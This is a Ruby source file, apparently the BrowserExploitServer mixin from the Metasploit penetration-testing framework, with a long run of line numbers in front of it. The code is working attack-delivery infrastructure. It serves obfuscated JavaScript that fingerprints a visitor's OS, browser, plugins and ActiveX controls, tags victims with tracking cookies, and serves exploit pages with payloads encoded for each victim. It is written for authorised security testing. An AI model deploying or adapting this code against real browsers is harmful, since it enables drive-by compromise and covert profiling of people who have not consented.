/
browser_exploit_server.rb
706 lines (606 loc) · 24.2 KB
/
browser_exploit_server.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
# -*- coding: binary -*-
require 'erb'
require 'cgi'
require 'date'
require 'set'
require 'rex/exploitation/js'
require 'msf/core/exploit/jsobfu'
require 'msf/core/exploit/remote/browser_profile_manager'
require 'msf/core/module'
###
#
# The BrowserExploitServer mixin provides methods to do common tasks seen in modern browser
# exploitation, and is designed to work against common setups such as on Windows, OSX, and Linux.
# Note that this mixin is designed to be compatible with both Exploit and Auxiliary modules.
# Wiki documentations about this mixin can be found here:
# https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer
# https://github.com/rapid7/metasploit-framework/wiki/Information-About-Unmet-Browser-Exploit-Requirements
#
###
module Msf
module Exploit::Remote::BrowserExploitServer
class BESException < RuntimeError; end
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::JSObfu
include Msf::Exploit::Remote::BrowserProfileManager
include Msf::Module::UI::Line::Verbose
include Msf::Module::UI::Message::Verbose
# this must be static between runs, otherwise the older cookies will be ignored
DEFAULT_COOKIE_NAME = '__ua'
PROXY_REQUEST_HEADER_SET = Set.new(%w{
CLIENT_IP
FORWARDED
FORWARDED_FOR
FORWARDED_FOR_IP
HTTP_CLIENT_IP
HTTP_FORWARDED
HTTP_FORWARDED_FOR
HTTP_FORWARDED_FOR_IP
HTTP_PROXY_CONNECTION
HTTP_VIA
HTTP_X_FORWARDED
HTTP_X_FORWARDED_FOR
VIA
X_FORWARDED
X_FORWARDED_FOR
})
# Requirements a browser module can define in either BrowserRequirements or in targets
REQUIREMENT_KEY_SET = Set.new([
'source', # Return either 'script' or 'headers'
'ua_name', # Example: Returns 'MSIE'
'ua_ver', # Example: Returns '8.0', '9.0'
'os_name', # Example: Returns 'Windows 7', 'Linux'
'os_device', # Example: Returns 'iPad', 'iPhone', etc
'os_vendor', # Example: Returns 'Microsoft', 'Ubuntu', 'Apple', etc
'os_sp', # Example: Returns 'SP2'
'language', # Example: Returns 'en-us'
'arch', # Example: Returns 'x86'
'proxy', # Returns 'true' or 'false'
'silverlight', # Returns 'true' or 'false'
'office', # Example: Returns "2007", "2010"
'java', # Example: Return '1.6', or maybe '1.6.0.0' (depends)
'mshtml_build', # mshtml build. Example: Returns "65535"
'flash', # Example: Returns "12.0" (chrome/ff) or "12.0.0.77" (IE)
'vuln_test', # Example: "if(window.MyComponentIsInstalled)return true;",
# :activex is a special case.
# When you set this requirement in your module, this is how it should be:
# [:clsid=>'String', :method=>'String']
# Where each Hash is a test case
# But when BES receives this information, the JavaScript will return this format:
# "CLSID=>Method=>Boolean;"
# Also see: #has_bad_activex?
'activex'
])
def initialize(info={})
super
# The mixin keeps 'target' handy so module doesn't lose it.
@target = self.respond_to?(:target) ? target : nil
# Requirements are conditions that the browser must have in order to be exploited.
@requirements = extract_requirements(self.module_info['BrowserRequirements'] || {})
@info_receiver_page = Rex::Text.rand_text_alpha(5)
@exploit_receiver_page = Rex::Text.rand_text_alpha(6)
@noscript_receiver_page = Rex::Text.rand_text_alpha(7)
@flash_swf = "#{Rex::Text.rand_text_alpha(9)}.swf"
register_options(
[
OptBool.new('Retries', [false, "Allow the browser to retry the module", true])
], Exploit::Remote::BrowserExploitServer)
register_advanced_options([
OptString.new('CookieName', [false, "The name of the tracking cookie", DEFAULT_COOKIE_NAME]),
OptString.new('CookieExpiration', [false, "Cookie expiration in years (blank=expire on exit)"]),
OptString.new('Custom404', [false, "An external custom 404 URL (Example: http://example.com/404.html)"])
], Exploit::Remote::BrowserExploitServer)
end
def setup
custom_404 = get_custom_404_url
if !custom_404.blank? && custom_404 !~ /^http/i
raise Msf::OptionValidateError.new(['Custom404 (must begin with http or https)'])
end
super
end
# Returns a prefix that's unique to this browser exploit module.
# This overrides the #browser_profile_prefix method from Msf::Exploit::Remote::BrowserProfileManager.
# There are two way for BES to get this prefix, either:
# * It comes from a datastore option. It allows BrowserAutoPwn to share the unique prefix with
# its child exploits, so that these exploits don't have to gather browser information again.
# * If the datastore option isn't set, then we assume the user is firing the exploit as a
# standalone so we make somthing more unique, so that if there are two instances using the
# same exploit, they don't actually share info.
def browser_profile_prefix
self.datastore['BrowserProfilePrefix'] || @unique_prefix ||= lambda {
"#{self.shortname}.#{Time.now.to_i}.#{self.uuid}"
}.call
end
# Cleans up target information owned by the current module.
def cleanup
super
# Whoever registered BrowserProfilePrefix should do the cleanup
clear_browser_profiles unless self.datastore['BrowserProfilePrefix']
end
# Returns the custom 404 URL set by the user
#
# @return [String]
def get_custom_404_url
datastore['Custom404'].to_s
end
# Returns the resource (URI) to the module to allow access to on_request_exploit
#
# @return [String] URI to the exploit page
def get_module_resource
"#{get_resource.to_s.chomp("/")}/#{@exploit_receiver_page}/"
end
# Returns the absolute URL to the module's resource that points to on_request_exploit
#
# @return [String] absolute URI to the exploit page
def get_module_uri
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
end
# Returns the current target
def get_target
@target
end
# Returns a hash of recognizable requirements
#
# @param reqs [Hash] A hash that contains data for the requirements
# @return [Hash] A hash of requirements
def extract_requirements(reqs)
tmp = reqs.select {|k,v| REQUIREMENT_KEY_SET.include?(k.to_s)}
# Make sure keys are always symbols
Hash[tmp.map{|(k,v)| [k.to_sym,v]}]
end
# Sets the target automatically based on what requirements are met.
# If there's a possible matching target, it will also merge the requirements.
# You can use the get_target() method to retrieve the most current target.
#
# @param profile [Hash] The profile to check
def try_set_target(profile)
return unless self.respond_to?(:targets)
match_counts = []
target_requirements = {}
targets.each do |t|
target_requirements = extract_requirements(t.opts)
if target_requirements.blank?
match_counts << 0
else
match_counts << target_requirements.select { |k,v|
if v.is_a? Regexp
profile[k] =~ v
else
profile[k] == v
end
}.length
end
end
if match_counts.max.to_i > 0
@target = targets[match_counts.index(match_counts.max)]
target_requirements = extract_requirements(@target.opts)
unless target_requirements.blank?
@requirements = @requirements.merge(target_requirements)
end
end
end
# Returns true if there's a bad ActiveX, otherwise false.
# @param ax [String] The raw activex the JavaScript detection will return in this format:
# "CLSID=>Method=>Boolean;"
# @return [Boolean] True if there's a bad ActiveX, otherwise false
def has_bad_activex?(ax)
ax.to_s.split(';').each do |a|
bool = a.split('=>')[2]
if bool == 'false'
return true
end
end
false
end
# Returns an array of items that do not meet the requirements
#
# @param profile [Hash] The profile to check
# @return [Array] An array of requirements not met
def get_bad_requirements(profile)
bad_reqs = []
@requirements.each do |rk, v|
k = rk.to_sym
expected = k != :vuln_test ? v : 'true'
vprint_status("Comparing requirement: #{k}=#{expected} vs #{k}=#{profile[k]}")
if k == :activex
bad_reqs << k if has_bad_activex?(profile[k])
elsif k == :vuln_test
bad_reqs << k unless profile[k].to_s == 'true'
elsif v.is_a? Regexp
bad_reqs << k if profile[k] !~ v
elsif v.is_a? Proc
bad_reqs << k unless v.call(profile[k])
else
bad_reqs << k if profile[k] != v
end
end
bad_reqs
end
# Retrieves a tag.
# First it obtains the tag from the browser's "Cookie" header.
# If the header is empty (possible if the browser has cookies disabled),
# then it will return a tag based on IP + the user-agent.
#
# @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
def retrieve_tag(cli, request)
cookie = CGI::Cookie.parse(request.headers['Cookie'].to_s)
tag = cookie.has_key?(cookie_name) && cookie[cookie_name].first
if tag.blank?
# Browser probably doesn't allow cookies, plan B :-/
vprint_status("No cookie received for #{cli.peerhost}, resorting to headers hash.")
ip = cli.peerhost
os = request.headers['User-Agent']
tag = Rex::Text.md5("#{ip}#{os}")
else
vprint_status("Received cookie '#{tag}' from #{cli.peerhost}")
end
tag
end
# Registers target information to @target_profiles
#
# @param source [Symbol] Either :script, or :headers
# @param cli [Socket] Socket for the browser
# @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
def process_browser_info(source, cli, request)
tag = retrieve_tag(cli, request)
browser_profile[tag] ||= {}
profile = browser_profile[tag]
profile[:source] = source.to_s
found_ua_name = ''
found_ua_ver = ''
# Gathering target info from the detection stage
case source
when :script
# Gathers target data from a POST request
parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
vprint_status("Received sniffed browser data over POST from #{cli.peerhost}")
vprint_line("#{parsed_body}.")
parsed_body.each { |k, v| profile[k.to_sym] = (v.first == 'null' ? nil : v.first) }
found_ua_name = parsed_body['ua_name']
found_ua_ver = parsed_body['ua_ver']
when :headers
# Gathers target data from headers
# This may be less accurate, and most likely less info.
fp = fingerprint_user_agent(request.headers['User-Agent'])
# Module has all the info it needs, ua_string is kind of pointless.
# Kill this to save space.
fp.delete(:ua_string)
fp.each do |k, v|
profile[k.to_sym] = v
end
found_ua_name = fp[:ua_name]
found_ua_ver = fp[:ua_ver]
end
# Other detections
profile[:proxy] = has_proxy?(request)
profile[:language] = request.headers['Accept-Language'] || ''
# Basic tracking
profile[:address] = cli.peerhost
profile[:module] = self.fullname
profile[:created_at] = Time.now
report_client({
:host => cli.peerhost,
:ua_string => request.headers['User-Agent'].to_s,
:ua_name => found_ua_name.to_s,
:ua_ver => found_ua_ver.to_s
})
end
# Checks if the target is running a proxy
#
# @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
# @return [Boolean] True if found, otherwise false
def has_proxy?(request)
proxy_header_set = PROXY_REQUEST_HEADER_SET & request.headers.keys
!proxy_header_set.empty?
end
# Returns the code for client-side detection
#
# @param user_agent [String] The user-agent of the browser
# @return [String] Returns the HTML for detection
def get_detection_html(user_agent)
ua_info = fingerprint_user_agent(user_agent)
os = ua_info[:os_name]
client = ua_info[:ua_name]
code = ERB.new(%Q|
<%= js_base64 %>
<%= js_os_detect %>
<%= js_ajax_post %>
<%= js_misc_addons_detect %>
<%= js_ie_addons_detect if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
function objToQuery(obj) {
var q = [];
for (var key in obj) {
q.push(encodeURIComponent(key) + '=' + encodeURIComponent(obj[key]));
}
return Base64.encode(q.join('&'));
}
function isEmpty(str) {
return (!str \|\| 0 === str.length);
}
function sendInfo(info) {
var query = objToQuery(info);
postInfo("<%=get_resource.chomp("/")%>/<%=@info_receiver_page%>/", query, function(){
window.location="<%= get_module_resource %>";
});
}
var flashVersion = "";
var doInterval = true;
var maxTimeout = null;
var intervalTimeout = null;
function setFlashVersion(ver) {
flashVersion = ver
if (maxTimeout != null) {
clearTimeout(maxTimeout);
maxTimeout = null
}
doInterval = false
return;
}
function createFlashObject(src, attributes, parameters) {
var i, html, div, obj, attr = attributes \|\| {}, param = parameters \|\| {};
attr.type = 'application/x-shockwave-flash';
if (window.ActiveXObject) {
attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
param.movie = src;
} else {
attr.data = src;
}
html = '<object';
for (i in attr) {
html += ' ' + i + '="' + attr[i] + '"';
}
html += '>';
for (i in param) {
html += '<param name="' + i + '" value="' + param[i] + '" />';
}
html += '</object>';
div = document.createElement('div');
div.innerHTML = html;
obj = div.firstChild;
div.removeChild(obj);
return obj;
}
window.onload = function() {
var osInfo = os_detect.getVersion();
var d = {
"os_vendor" : osInfo.os_vendor,
"os_device" : osInfo.os_device,
"ua_name" : osInfo.ua_name,
"ua_ver" : osInfo.ua_version,
"arch" : osInfo.arch,
"java" : misc_addons_detect.getJavaVersion(),
"silverlight" : misc_addons_detect.hasSilverlight(),
"flash" : misc_addons_detect.getFlashVersion(),
"vuln_test" : <%= js_vuln_test %>,
"os_name" : osInfo.os_name
};
<% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
d['office'] = ie_addons_detect.getMsOfficeVersion();
d['mshtml_build'] = ScriptEngineBuildVersion().toString();
<%
activex = @requirements[:activex]
if activex
activex.each do \|a\|
clsid = a[:clsid]
method = a[:method]
%>
var ax = ie_addons_detect.hasActiveX('<%=clsid%>', '<%=method%>');
d['activex'] = "";
if (ax == true) {
d['activex'] += "<%=clsid%>=><%=method%>=>true;";
} else {
d['activex'] += "<%=clsid%>=><%=method%>=>false;";
}
<% end %>
<% end %>
<% end %>
if (d["flash"] != null && (d["flash"].match(/[\\d]+.[\\d]+.[\\d]+.[\\d]+/)) == null) {
var flashObject = createFlashObject('<%=get_resource.chomp("/")%>/<%=@flash_swf%>', {width: 1, height: 1}, {allowScriptAccess: 'always', Play: 'True'});
// After 5s stop waiting and use the version retrieved with JS if there isn't anything
maxTimeout = setTimeout(function() {
if (intervalTimeout != null) {
doInterval = false
clearInterval(intervalTimeout)
}
if (!isEmpty(flashVersion)) {
d["flash"] = flashVersion
}
sendInfo(d);
}, 5000);
// Check if there is a new flash version every 100ms
intervalTimeout = setInterval(function() {
if (!doInterval) {
clearInterval(intervalTimeout);
if (!isEmpty(flashVersion)) {
d["flash"] = flashVersion
}
sendInfo(d);
}
}, 100);
document.body.appendChild(flashObject)
} else {
sendInfo(d)
}
}
|).result(binding())
js = ::Rex::Exploitation::JSObfu.new code
js.obfuscate
%Q|
<script>
#{js}
</script>
<noscript>
<img style="visibility:hidden" src="#{get_resource.chomp("/")}/#{@noscript_receiver_page}/">
<meta http-equiv="refresh" content="1; url=#{get_module_resource}">
</noscript>
|
end
# @return [String] Name of the tracking cookie
def cookie_name
datastore['CookieName'] || DEFAULT_COOKIE_NAME
end
# @return [String] HTTP header string for the tracking cookie
def cookie_header(tag)
cookie = "#{cookie_name}=#{tag};"
if datastore['CookieExpiration'].present?
expires_date = (DateTime.now + 365*datastore['CookieExpiration'].to_i)
expires_str = expires_date.to_time.strftime("%a, %d %b %Y 12:00:00 GMT")
cookie << " Expires=#{expires_str};"
end
cookie
end
def load_swf_detection
path = ::File.join(Msf::Config.data_directory, 'flash_detector', 'flashdetector.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
# Handles exploit stages.
#
# @param cli [Socket] Socket for the browser
# @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
def on_request_uri(cli, request)
case request.uri
when '/', get_resource.chomp("/")
#
# This is the information gathering stage
#
if browser_profile[retrieve_tag(cli, request)]
send_redirect(cli, get_module_resource)
return
end
print_status("Gathering target information for #{cli.peerhost}")
tag = Rex::Text.rand_text_alpha(rand(20) + 5)
ua = request.headers['User-Agent'] || ''
print_status("Sending HTML response to #{cli.peerhost}")
html = get_detection_html(ua)
send_response(cli, html, {'Set-Cookie' => cookie_header(tag)})
when /#{@flash_swf}/
vprint_status("Sending SWF used for Flash detection to #{cli.peerhost}")
swf = load_swf_detection
send_response(cli, swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
when /#{@info_receiver_page}/
#
# The detection code will hit this if Javascript is enabled
#
vprint_status "Info receiver page called from #{cli.peerhost}"
process_browser_info(:script, cli, request)
send_response(cli, '', {'Set-Cookie' => cookie_header(tag)})
when /#{@noscript_receiver_page}/
#
# The detection code will hit this instead of Javascript is disabled
# Should only be triggered by the img src in <noscript>
#
process_browser_info(:headers, cli, request)
send_not_found(cli)
when /#{@exploit_receiver_page}/
#
# This sends the actual exploit. A module should define its own
# on_request_exploit() to get the target information
#
tag = retrieve_tag(cli, request)
vprint_status("Serving exploit to user #{cli.peerhost} with tag #{tag}")
profile = browser_profile[tag]
if profile.nil?
print_status("Browser visiting directly to the exploit URL is forbidden.")
send_not_found(cli)
elsif profile[:tried] && !datastore['Retries']
print_status("Target #{cli.peerhost} with tag \"#{tag}\" wants to retry the module, not allowed.")
send_not_found(cli)
else
profile[:tried] = true
vprint_status("Setting target \"#{tag}\" to :tried.")
try_set_target(profile)
bad_reqs = get_bad_requirements(profile)
if bad_reqs.empty?
browser_info = profile.dup
begin
method(:on_request_exploit).call(cli, request, browser_info)
rescue BESException => e
elog("BESException: #{e.message}\n#{e.backtrace * "\n"}")
send_not_found(cli)
print_error("BESException: #{e.message}")
end
else
print_warning("Exploit requirement(s) not met: #{bad_reqs * ', '}. For more info: http://r-7.co/PVbcgx")
if bad_reqs.include?(:vuln_test)
error_string = (self.module_info['BrowserRequirements'] || {})[:vuln_test_error]
if error_string.present?
print_warning(error_string)
end
end
send_not_found(cli)
end
end
else
print_error("Target #{cli.peerhost} has requested an unknown path: #{request.uri}")
send_not_found(cli)
end
end
# Overriding method. The module should override this.
#
# @param cli [Socket] Socket for the browser
# @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
# @param browser_info [Hash] The target profile
def on_request_exploit(cli, request, browser_info)
raise NoMethodError, "Module must define its own on_request_exploit method"
end
# Converts an ERB-based exploit template into HTML, and sends to client
#
# @param cli [Socket] Socket for the browser
# @param template [String] The ERB template. If you want to pass the binding object,
# then this is handled as an Array, with the first element
# being the HTML, and the second element is the binding object.
# @param headers [Hash] The custom HTTP headers to include in the response
def send_exploit_html(cli, template, headers={})
html = ''
if template.class == Array
html = ERB.new(template[0]).result(template[1])
else
html = ERB.new(template).result
end
send_response(cli, html, headers)
end
# Generates a target-specific payload, should be called by the module
#
# @param cli [Socket] Socket for the browser
# @param browser_info [Hash] The target profile
# @return [String] The payload
def get_payload(cli, browser_info)
arch = browser_info[:arch]
platform = browser_info[:os_name]
# Fix names for consistency so our API can find the right one
# Originally defined in lib/msf/core/constants.rb
platform = platform.gsub(/^Mac OS X$/, 'OSX')
platform = platform.gsub(/^Windows.*$/, 'Windows')
p = regenerate_payload(cli, platform, arch)
target_arch = get_target.arch || arch
unless p.arch.all? { |e| target_arch.include?(e) }
err = "The payload arch (#{p.arch * ", "}) is incompatible with the target (#{target_arch * "\n"}). "
err << "Please check your payload setting."
raise BESException, err
end
return p.encoded
end
# @return [String] custom Javascript to check if a vulnerability is present
def js_vuln_test
all_reqs = self.module_info['BrowserRequirements'] || {}
if all_reqs[:vuln_test].present?
code = all_reqs[:vuln_test] + ';return !!this.is_vuln;'
'Function(('+JSON.generate(:code => code)+').code)()'
else
'true'
end
end
private
# Sends a 404 response. If a custom 404 is configured, then it will redirect to that instead.
def send_not_found(cli)
custom_404_url = get_custom_404_url
if custom_404_url.blank?
super(cli)
else
send_redirect(cli, custom_404_url)
end
end
end
end